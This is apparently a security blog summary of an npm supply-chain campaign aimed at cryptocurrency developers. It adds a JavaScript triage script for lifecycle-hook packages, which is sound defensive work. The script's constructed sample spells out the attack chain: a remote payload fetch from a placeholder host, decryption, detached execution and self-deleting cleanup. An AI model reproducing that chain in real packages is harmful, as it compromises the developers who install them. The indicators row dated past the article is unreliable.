Update to November’s Crypto-Themed npm Attack

2024-01-05 Phylum

https://blog.phylum.io/update-to-novembers-crypto-themed-npm-attack/


Phylum reports that a crypto-themed npm package campaign first described in November remained active, with nearly two dozen additional packages identified through December 2023. The packages download a remote binary during installation, decrypt and execute it, then delete or rename files to leave the package directory looking benign. QiAnXin's reverse engineering linked the downloader malware to a North Korean APT and assessed the npm poisoning as likely Lazarus-related, while Phylum cautions that it could be another North Korean-backed group sharing infrastructure. The campaign appears aimed at cryptocurrency developers, with the likely objective of gaining developer footholds and reaching organizations that hold crypto assets.
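The install-time downloader pattern summarized above (a lifecycle hook fetches a remote payload, decrypts and runs it, then deletes or renames files to tidy up) is something a practitioner can triage statically before a package is ever installed. The script below is an added example written for this page, not Phylum's tooling or anything from the campaign: it parses a package's package.json, pulls out the npm lifecycle hooks, scans the hook commands plus any local scripts they reference for the individual behaviours the campaign combines, and grades the package. The signal regexes and the grading rule are assumptions of this example, and both sample packages (including the placeholder payload domain) are constructed for illustration.

```javascript
"use strict";
// Static triage for the npm install-time downloader pattern: lifecycle hook ->
// remote fetch -> decrypt -> execute -> delete/rename. Added example for this
// page, not Phylum's code; signal regexes and grading are assumptions.

// npm runs these hooks automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each signal is one behaviour from the described chain. No `g` flag, so
// RegExp.test() is stateless across calls.
const SIGNALS = [
  ["remote-fetch",  /https?:\/\/|\bcurl\b|\bwget\b|\bfetch\(|\bhttps?\.get\(/],
  ["decrypt",       /\bcreateDecipheriv\b|\bcreateDecipher\b/],
  ["child-process", /\bchild_process\b|\bexecSync\b|\bspawnSync\b|\bspawn\(|\bexecFile\b/],
  ["self-cleanup",  /\bunlinkSync\b|\bunlink\(|\brmSync\b|\brenameSync\b|\brename\(/],
];

// Local files named in a hook command ("node install.js", "sh ./setup.sh")
// are scanned together with the command itself.
function referencedFiles(command, fileMap) {
  return command
    .split(/\s+/)
    .map((tok) => tok.replace(/^\.\//, ""))
    .filter((tok) => tok !== "package.json" &&
      Object.prototype.hasOwnProperty.call(fileMap, tok));
}

// fileMap: { "package.json": text, "<path>": text, ... } for an unpacked tarball.
function auditPackage(fileMap) {
  const pkg = JSON.parse(fileMap["package.json"]);
  const scripts = pkg.scripts || {};
  const hooks = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    const command = scripts[hook];
    const body = [command, ...referencedFiles(command, fileMap).map((f) => fileMap[f])].join("\n");
    const signals = SIGNALS.filter(([, re]) => re.test(body)).map(([label]) => label);
    hooks.push({ hook, command, signals });
  }
  // Grading rule (assumption): fetching and executing at install time is the
  // core of the pattern; any other signal alone warrants a manual look.
  const seen = new Set(hooks.flatMap((h) => h.signals));
  let verdict = "none";                                   // no lifecycle hooks
  if (seen.has("remote-fetch") && seen.has("child-process")) verdict = "high";
  else if (seen.size > 0) verdict = "review";
  else if (hooks.length > 0) verdict = "low";             // hooks, but nothing flagged
  return { name: pkg.name, hooks, verdict };
}

// Constructed sample mimicking the described chain (domain is a placeholder).
const SUSPICIOUS_PKG = {
  "package.json": JSON.stringify({
    name: "example-crypto-sdk", version: "1.0.0",
    scripts: { postinstall: "node install.js" },
  }),
  "install.js": `
    const https = require("https"), fs = require("fs"), crypto = require("crypto");
    const { spawn } = require("child_process");
    https.get("https://payload.example.invalid/bin.enc", (res) => {
      const chunks = [];
      res.on("data", (c) => chunks.push(c));
      res.on("end", () => {
        const d = crypto.createDecipheriv("aes-256-cbc", KEY, IV);
        fs.writeFileSync("./.cache", Buffer.concat([d.update(Buffer.concat(chunks)), d.final()]));
        spawn("./.cache", [], { detached: true, stdio: "ignore" }).unref();
        fs.unlinkSync("install.js");                 // remove the downloader
        fs.renameSync("package.json.bak", "package.json");
      });
    });`,
};

// Constructed benign sample: a postinstall hook that only builds locally.
const BENIGN_PKG = {
  "package.json": JSON.stringify({
    name: "example-utils", version: "2.1.0",
    scripts: { test: "node test.js", postinstall: "node build.js" },
  }),
  "build.js": `const fs = require("fs"); fs.mkdirSync("dist", { recursive: true });`,
};

for (const sample of [SUSPICIOUS_PKG, BENIGN_PKG]) {
  console.log(JSON.stringify(auditPackage(sample), null, 2));
}
```

Run against an unpacked tarball (`npm pack <name>` then read the files into the map), this flags the suspicious sample as "high" with all four signals on its postinstall hook, and grades the benign one "low" because a build-only hook matches nothing. Treat the result as triage, not proof: a real audit still reads the hook script, and obfuscated loaders that assemble `require("child_process")` at runtime will slip past simple regexes.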

Indicators of Compromise

Type    Value      First Seen   Last Seen
DOMAIN  stake.com  2023-09-05   2025-12-31
